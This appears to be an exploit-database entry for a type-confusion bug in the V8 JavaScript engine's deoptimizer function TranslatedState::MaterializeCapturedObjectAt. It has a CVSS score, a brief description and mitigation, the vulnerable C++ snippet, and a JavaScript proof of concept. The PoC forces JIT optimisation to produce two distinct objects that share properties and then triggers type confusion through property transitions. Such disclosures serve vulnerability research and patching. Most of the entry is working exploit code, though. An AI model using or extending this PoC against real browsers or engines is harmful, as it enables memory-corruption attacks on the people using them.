Type Confusion in TranslatedState::MaterializeCapturedObjectAt

vendor:

N/A

by:

Anonymous

7.5

CVSS

HIGH

Type Confusion

843

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

Type Confusion in TranslatedState::MaterializeCapturedObjectAt

The TranslatedState::MaterializeCapturedObjectAt function does not cache the created objects like 'slot->value_ = object', which can be used to create different objects but sharing the same properties, leading to type confusion. The proof-of-concept code creates two objects with the same properties, but they are not equal. Changing the property of one object affects the other object, demonstrating type confusion.

Mitigation:

Ensure that objects are cached properly and that type confusion is not possible.

Source

Exploit-DB raw data:

/*
Here'a snippet of TranslatedState::MaterializeCapturedObjectAt.
    case JS_SET_KEY_VALUE_ITERATOR_TYPE:
    case JS_SET_VALUE_ITERATOR_TYPE: {
      Handle<JSSetIterator> object = Handle<JSSetIterator>::cast(
          isolate_->factory()->NewJSObjectFromMap(map, NOT_TENURED));
      Handle<Object> properties = materializer.FieldAt(value_index);
      Handle<Object> elements = materializer.FieldAt(value_index);
      Handle<Object> table = materializer.FieldAt(value_index);
      Handle<Object> index = materializer.FieldAt(value_index);
      object->set_raw_properties_or_hash(*properties);
      object->set_elements(FixedArrayBase::cast(*elements));
      object->set_table(*table);
      object->set_index(*index);
      return object;
    }
    case JS_MAP_KEY_ITERATOR_TYPE:
    case JS_MAP_KEY_VALUE_ITERATOR_TYPE:
    case JS_MAP_VALUE_ITERATOR_TYPE: {
      Handle<JSMapIterator> object = Handle<JSMapIterator>::cast(
          isolate_->factory()->NewJSObjectFromMap(map, NOT_TENURED));
      Handle<Object> properties = materializer.FieldAt(value_index);
      Handle<Object> elements = materializer.FieldAt(value_index);
      Handle<Object> table = materializer.FieldAt(value_index);
      Handle<Object> index = materializer.FieldAt(value_index);
      object->set_raw_properties_or_hash(*properties);
      object->set_elements(FixedArrayBase::cast(*elements));
      object->set_table(*table);
      object->set_index(*index);
      return object;
    }

For these 5 types, it doesn't cache the created objects like "slot->value_ = object". This can be used to create different objects but sharing the same properties which may lead to type confusion.

PoC:
*/

function opt(b) {
    let iterator = new Set().values();
    iterator.x = 0;

    let arr = [iterator, iterator];
    if (b)
        return arr.slice();
}

for (let i = 0; i < 100000; i++)
    opt(false);

let res = opt(true);
let a = res[0];
let b = res[1];

print(a === b);  // false
a.x = 7;

print(b.x);  // 7

a.a = 1.1;  // transition
b.b = 0x1234;
a.a = 1.1;  // type confusion